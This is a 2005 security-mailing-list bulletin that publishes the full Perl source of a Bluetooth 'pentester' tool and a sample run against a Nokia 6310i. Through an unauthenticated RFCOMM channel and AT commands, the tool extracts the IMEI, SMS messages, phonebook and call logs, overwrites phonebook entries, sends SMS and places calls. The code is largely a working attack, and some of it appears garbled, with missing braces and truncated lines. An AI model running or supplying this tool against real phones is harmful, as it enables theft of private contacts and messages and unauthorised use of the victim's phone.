AT Command Serial Port Perl

[TOOL] BlueTest - Bluetooth Scanner

From: SecuriTeam (

Date: 18 Jul 2005 17:20:26 +0200

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  BlueTest - Bluetooth Scanner 



Kroma Pierre wrote a tool that can scan 
<> Bluetooth devices: 

What can it do? 
1. Search devices 
2. Ping a device (optional) 
3. Bind a device (ex. 6310i) 
4. Extract device information 
5. Extract/manipulate phonebook entries 
6. Extract/manipulate SMS entries (Only Nokia 6310i is supported) 
7. Extract dialed numbers, missed calls, received calls 
8. Make a call (hangup after 20 sec.) 

What do you need to run it? 
1. Mobile device/phone (example: 6310i) 
2. Perl + 
3. Bluetooth adapter (example: linksyss usbbt100) 
4. Start the script as root (you need root to bind a device at 


# bluetooth hacking tool 

# written by pierre kroma 

use Device::Gsm; 
use Getopt::Std; 
use Term::ReadLine; 
use Device::Modem; 
use Term::ANSIColor; 

############## U S A G E ################## 
getopts("bcpsv", \%args); 

system ("clear"); 
print "\nBluetooth Pentester\n"; 
print "written by pierre kroma (kroma\\n\n"; 

if (!defined $args{s}) { 
print qq~ 
Usage: perl -s { -b -c channel -p -v } 
        -b = hardware address of the target bluetooth device 
(example: 00:11:22:33:44:55) 
        -c = channel 
 -p = ping the remote device 
 -s = start the script 
        -v = be verbose 

~; exit;} 

################# D E F I N I T I O N ########## 
# tools 
my $hcitool="/usr/bin/hcitool"; 
my $l2ping ="/usr/bin/l2ping"; 
my $rfcomm ="/usr/bin/rfcomm"; 
my $lsusb = "/usr/sbin/lsusb"; 
my $hciconfig = "/usr/sbin/hciconfig"; 
my $bluefw = "/sbin/bluefw"; 

# variable 
my $bluedev="hci0"; 
my $bt_addr = 0; 
my $channel = $args{c}; 
my $i = 0; 

########## S U B R O U T I N E S ################# 

sub init_adapter 

 use strict; 

 my $busnum = ""; 
 my $devnum = ""; 
 # busid 0a12:0001 = linksys USBBT100 usb bluetooth stick 
 my $id = `$lsusb 2>/dev/null |grep 0a12:0001`; 
 # more generic 
 # my $id = `$lsusb 2>/dev/null |grep -i bluetooth`; 

 if ( $id =~ /Bus (\d{3}) Device (\d{3}): ID 0a12:0001/ ) 
  $busnum = $1; 
  $devnum = $2; 
  system("$bluefw usb $busnum\/$devnum"); 
  system("$hciconfig $bluedev up"); 

sub init_modem 

 $modem = new Device::Modem( port => '/dev/rfcomm0' ); 
 if( $modem->connect( baudrate => 9600 ) ) { 
        # print "connected!\n"; 
   } else { 
        print "sorry, cannot connect to your serial port!\n"; 
 # turn off the local echo 

sub searching 

 print color 'bold blue'; 
 print "search devices\n"; 
 print color 'reset'; 
 my @scan = `$hcitool scan | grep -v "Scanning"`; 
 foreach $line (@scan) 
  print $i++; 
  print $line; 
 print "\n"; 

sub selecting 

 # select a device 
  $bt_addr = $args{b}; 
  $term = new Term::ReadLine 'bluetooth address reader'; 
  my $prompt = "Enter hw-addr (example: 00:11:22:33:44:55): "; 
  my $OUT = $term->OUT || \*STDOUT; 
  $bt_addr = $term->readline($prompt); 

sub ping 

 # ping the remote device 
     # ping the remote device 
     print color 'bold blue'; 
     print "\nping the remote device $bt_addr\n"; 
     print color 'reset'; 
     die "You must be root to use l2ping!\n" if $> != 0; 
     system ("$l2ping -c 5 $bt_addr"); 

sub binding 

 # binding a device 
 print color 'bold blue'; 
 print "\n\nbind a device to $bt_addr \t\t"; 
 print color 'reset'; 
  $channel = $args{c}; 
  # setting default nokia 6310i hidden channel 17 or 18 
  $channel = 17; 

 system("$rfcomm release $bluedev 2>/dev/null"); 
 system("$rfcomm bind $bluedev $bt_addr $channel 2>/dev/null"); 

 # Connect to the mobile phone 
 # for devfs 
 # my $gsm = new Device::Gsm( port => '/dev/bluetooth/rfcomm/0' ); 

 # for udev 
 $gsm = new Device::Gsm( port => '/dev/rfcomm0' ); 

   if( $gsm->connect() ) 
  print color 'bold green'; 
        print "connected!\n"; 
  print color 'reset'; 
  print color 'bold red'; 
        print "sorry, no connection with gsm phone on serial port!\n"; 
  print color 'reset'; 
  exit (1); 

 # Register to GSM network 

sub manu 

 # Extract the manufacturer 
 my $man_name = $gsm->manufacturer(); 
 print "manufacture: $man_name \n"; 

sub model 

 # model 
 my $model = $gsm->model(); 
 print "model: $model \n"; 

sub sw 

 # software revision 
 $modem->atsend( 'AT+CGMR' . Device::Modem::CR ); 
   $rev = $modem->answer(); 
 $rev =~ s/\r//g; 
 $rev =~ s/OK//g; 
 print "software revision: \n \n $rev"; 

sub imei 

 # Extract the IMEI number 
 my $imei = $gsm->imei(); 
 $imei =~ s/\r//g; 
 $imei =~ s/OK//g; 
 print "IMEI: (International Mobile Equipment Identifier) = $imei \n\n"; 

sub readbook 

 print color 'bold blue'; 
 print "\n\nextract the phonebook\n\n"; 
 print color 'reset'; 
 print "storagelocation:"; 
 print qq~ 
ME => storage: device 
SM => storage: SIM-card 
MT => combination of ME + SM (doesn t work FOR MY 6310i) 
BM => storage: CB-news 
 print "\nsupported storage location"; 
 $modem->atsend( 'AT+CPMS=?' . Device::Modem::CR ); 
   $types = $modem->answer(); 
 $types =~ s/\r//g; 
        $types =~ s/\n//g; 
 $types =~ s/OK//g; 
 $types =~ s/\+CPMS//g; 
 print "$types \n"; 
 print "\ncurrent phonebooksource"; 
 $modem->atsend( 'AT+CPBS?' . Device::Modem::CR ); 
   $source = $modem->answer(); 
 $source =~ s/\r//g; 
        $source =~ s/\n//g; 
 $source =~ s/OK//g; 
 $source =~ s/\+CPBS//g; 
 print $source; 
 print "\n\n"; 

 print "\ncurrent used storage on device"; 
 $modem->atsend( $command . Device::Modem::CR ); 
 $modem->atsend( 'AT+CPBS?' . Device::Modem::CR ); 
   $memory = $modem->answer(); 
 $memory =~ s/\r//g; 
        $memory =~ s/\n//g; 
 $memory =~ s/OK//g; 
 $memory =~ s/\+CPBS//g; 
 print $memory; 

 print "\ncurrent used storage on SIM"; 
 $modem->atsend( $command . Device::Modem::CR ); 
 $modem->atsend( 'AT+CPBS?' . Device::Modem::CR ); 
   $source = $modem->answer(); 
 $source =~ s/\r//g; 
        $source =~ s/\n//g; 
 $source =~ s/OK//g; 
 $source =~ s/\+CPBS//g; 
 print $source; 
 print "\n\n"; 

 my $prompt = "What do you want to readout? (ME oder SM) : "; 
 my $OUT = $term->OUT || \*STDOUT; 
 $type = $term->readline($prompt); 

 $command = "AT+CPBS=\"$type\""; 
 $modem->atsend( $command . Device::Modem::CR ); 
   $asource = $modem->answer(); 
 $asource =~ s/\r//g; 
        $asource =~ s/\n//g; 
 $asource =~ s/OK//g; 
 print $asource; 

 my $prompt = "starting from entry (>=0): \t "; 
 my $OUT = $term->OUT || \*STDOUT; 
 $start = $term->readline($prompt); 
 print "\n"; 
 my $prompt = "ending to entry:\t\t"; 
 my $OUT = $term->OUT || \*STDOUT; 
 $max = $term->readline($prompt); 
 print "\n"; 

 if ( $start > $max || $start <= '0' ) 
  print "oops damn f*cking long night? \n"; 
  print "initial value <= 0? \n"; 
  print "or initial value > final value? \n"; 
  exit (1); 
 list_entries (); 

 print "\nextract last 5 dialled numbers: \n"; 
 $command = "AT+CPBS=\"DC\""; 
 $modem->atsend( $command . Device::Modem::CR ); 
   $asource = $modem->answer(); 
 $asource =~ s/\r//g; 
        $asource =~ s/\n//g; 
 $asource =~ s/OK//g; 
 print $asource; 
 list_entries (); 

 print "\nlast 5 missed calls: \n"; 
 $command = "AT+CPBS=\"MC\""; 
 $modem->atsend( $command . Device::Modem::CR ); 
   $asource = $modem->answer(); 
 $asource =~ s/\r//g; 
        $asource =~ s/\n//g; 
 $asource =~ s/OK//g; 
 print $asource; 
 list_entries (); 

 print "\nlast 5 received calls: \n"; 
 $command = "AT+CPBS=\"RC\""; 
 $modem->atsend( $command . Device::Modem::CR ); 
   $asource = $modem->answer(); 
 $asource =~ s/\r//g; 
        $asource =~ s/\n//g; 
 $asource =~ s/OK//g; 
 print $asource; 
 list_entries (); 

sub list_entries 

 $i = $start; 
 foreach $i ( $start..$max ) 
  $command = "AT+CPBR=$i"; 
  $modem->atsend( $command . Device::Modem::CR ); 
  $entry = $modem->answer(); 

  # format 
  $entry =~ s/\r//g; 
         $entry =~ s/\n//g; 
  $entry =~ s/OK//g; 

  # parse 
  # type = 145 = international format = number starts with + 
  # type = 129 = unknown number format = didn't start with + 

         ( $pos, $num, $type, $tag ) = $entry =~ m/^\+CPBR: 

  $type =~ s/145/international/g; 
  $type =~ s/129/unknown/g; 
  if ( $num == '' ) 
   print "entry $i: is empty \n"; 
   print "entry $i: $num, $type, $tag \n"; 

sub sendsms 

 # Send a text message quickly 
 print color 'bold blue'; 
 print "\n\nwrite a message (SMS)\n"; 
 print color 'reset'; 
 print "\n"; 
 my $prompt = "recipient (example +4912345678): "; 
 my $OUT = $term->OUT || \*STDOUT; 
 $recipient = $term->readline($prompt); 
 print "\n"; 

 my $prompt = "message: "; 
 my $OUT = $term->OUT || \*STDOUT; 
 $message = $term->readline($prompt); 

 my $status = $gsm->send_sms( 
          recipient => $recipient, 
          content => $message 
 if ( $status ) 
  print color 'bold green'; 
  print "\nmessage transmitted successfully.\n"; 
  print color 'reset'; 
  print color 'bold red'; 
  print "\nERROR: message couldn`t delivered.\n" ; 
  print color 'reset'; 

sub readsms 

 # Get list of device::Gsm::Sms message objects 
 # see `examples/' for all details 
 # get mode status 
 $modem->atsend( 'AT+CMGF?' . Device::Modem::CR ); 
 print color 'bold blue'; 
 print "\nSMS Menu"; 
 print color 'reset'; 
 print "\n \ncurrent sms status (0=PDU, 1=text)"; 
   my $status = $modem->answer(); 
 $status =~ s/\r//g; 
        $status =~ s/\n//g; 
 $status =~ s/OK//g; 
 $status =~ s/\+CMGF//g; 
 print $status; 
 # switch to text mode (does not work with 6310i) 
 # print "switch to text mode \n"; 
 # $modem->atsend( 'AT+CMGF=1' . Device::Modem::CR ); 
   # print $modem->answer(); 

 print "\n\nextract all sms \n"; 
 $modem->atsend( 'AT+CMGL=4' . Device::Modem::CR ); 
   my $extract = $modem->answer(); 
 $extract =~ s/OK//g; 
 $extract =~ s/\+CMGL://g; 
 print $extract; 

sub call 

 # read number 
 print color 'bold blue'; 
 print "\n\nmaking a call\n"; 
 print color 'reset'; 
 print "\n"; 
 my $prompt = "Which number should be called? (example: 004970714078560): 
 my $OUT = $term->OUT || \*STDOUT; 
 $number = $term->readline($prompt); 
 print "\ncalling $number \n"; 
 my $max = 20; 
 if (fork) 
  $modem->dial( $number ); 
  print "waiting $max seconds before ring off: "; 
  $i = 0; 
  foreach $i ( 1..$max ) 
   print "$i "; 
  print "\n"; 

sub writebook 

 print color 'bold blue'; 
 print "\ncreate a phonebook entry"; 
 print color 'reset'; 
 print "\n"; 
 my $prompt = "storage space number (ATTENTION: you may overwrite an 
existing entry:): "; 
 my $OUT = $term->OUT || \*STDOUT; 
 $nr = $term->readline($prompt); 
 print "\n"; 
 my $prompt = "phone-number (format +49123456789): "; 
 my $OUT = $term->OUT || \*STDOUT; 
 $tel = $term->readline($prompt); 
 print "\n"; 
 my $prompt = "name: "; 
 my $OUT = $term->OUT || \*STDOUT; 
 $name = $term->readline($prompt); 
 print "\n"; 
 my $prompt = "storage location (ME=device, SM=SIM): "; 
 my $OUT = $term->OUT || \*STDOUT; 
 $place = $term->readline($prompt); 

 $modem->atsend( $command . Device::Modem::CR ); 

 $modem->atsend( $command . Device::Modem::CR ); 
   $source = $modem->answer(); 
 $source =~ s/\r//g; 
        $source =~ s/\n//g; 
 $source =~ s/OK//g; 
 print $source; 

 print "\n\nchecking......"; 
 $start = $nr - 5; 
 $max = 5; 
 if ( $start <= 0 ) 
  $start = $nr; 
 $max = $nr + 5; 
 print "\n extract your phonebook from storage space number $start to $max 
 list_entries (); 
 print "\n"; 

sub key 

 my $message = "- press any key -"; 
 my $OUT = $term->OUT || \*STDOUT; 

sub final 

 #system ('cat ./logo.txt'); 
 print color 'bold red'; 
 print "\t\t\t\twritten by pierre kroma (kroma\\n\n"; 
 print color 'reset'; 
 print "\n"; 


############### M A I N ################ 

init_adapter (); 
searching (); 
selecting (); 
ping (); 
binding (); 
init_modem (); 
print color 'bold blue'; 
print "\nextract device information\n"; 
print color 'reset'; 
manu (); 
model (); 
sw (); 
imei (); 
readsms (); 
sendsms (); 
key (); 
readbook (); 
writebook (); 
key (); 
call (); 
key (); 
final (); 

Example results: 
# test: # 

Bluetooth Pentester 
written by pierre kroma ( 

search devices 
0 00:60:57:XX:XX:XX Exploit 

Enter hw-addr (example: 00:11:22:33:44:55): 00:60:57:XX:XX:XX 

bind a device to 00:60:57:XX:XX:XX connected! 

extract device information 
manufacture: Nokia 
model: Nokia 6310i 
software revision: 
 V 5.51 
(c) NMP. 

IMEI: (International Mobile Equipment Identifier) = XXXXXXXXXXXXXXXX 

- press any key - 

SMS Menu 
current sms status (0=PDU, 1=text): 0 

extract all sms 
0791971 ----------- c u t ---------------- ( ;-) ) 

write a message (SMS) 

recipient (example +4912345678): +491727777777 
message: SMILE 

message transmitted successfully. 

extract the phonebook 

supported storage location: ("ME","SM"),("ME","SM"),("MT") 

current phonebooksource: "SM",16,100 

current used storage on device: "ME",9,500 
current used storage on SIM: "SM",16,100 

What do you want to readout? (ME oder SM) : SM 
starting from entry (>=0): 18 
ending to entry: 30 

entry 18: is empty 
entry 19: is empty 
entry 20: +49110, international, SySS-Hotline 
entry 21: +4917222442, international, D2-Blumengruss 
entry 22: +4917222334, international, D2-Events 
entry 23: +4911880, international, Telefonauskunft 
entry 24: +4917222333, international, D2-Hotelservice 
entry 25: 22444, unknown, D2-Wetterinfo 
entry 26: 222222, unknown, D2-ADAC Pannenhilf 
entry 27: +4917222330, international, D2-Reiseservice 
entry 28: 22666, unknown, D2-PassoVoice 
entry 29: 22922, unknown, D2-Konto-Server 
entry 30: 22933, unknown, D2-HandyBrse 

extract last 5 dialled numbers: 
entry 1: 012334566, unknown, 
entry 2: 0123454566, unknown, 
entry 3: 09345739857, unknown, 
entry 4: 09287429184, unknown, 
entry 5: +49123456789, international, 

last 5 missed calls: 
entry 1: +49110, international, 
entry 2: +4919222, international, 
entry 3: +49112, international, 
entry 4: is empty 
entry 5: is empty 

last 5 received calls: 
entry 1: is empty 
entry 2: +4970714078560, international, 
entry 3: +4900001111111, international, 
entry 4: +4911111111111, international, 
entry 5: +49123456789, international, 

create a phonebook entry 
storage space number (ATTENTION: you may overwrite an existing entry:): 19 
phone-number (format +49123456789): +49666666 
name: Callgirl 

storage location (ME=device, SM=SIM): SM 

 extract your phonebook from storage space number 14 to 24 
entry 14: is empty 
entry 15: is empty 
entry 16: is empty 
entry 17: is empty 
entry 18: is empty 
entry 19: +49666666, international, Callgirl 
entry 20: +49110, international, SySS-Hotline 
entry 21: +4917222442, international, D2-Blumengruss 
entry 22: +4917222334, international, D2-Events 
entry 23: +4911880, international, Telefonauskunft 
entry 24: +4917222333, international, D2-Hotelservice 

making a call 
Which number should be called? (example: 004970714078560): 004970714078560 
calling 004970714078560 
waiting 20 seconds before ring off: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 
17 18 19 20 


The information has been provided by Kroma Pierre. 


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The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. 

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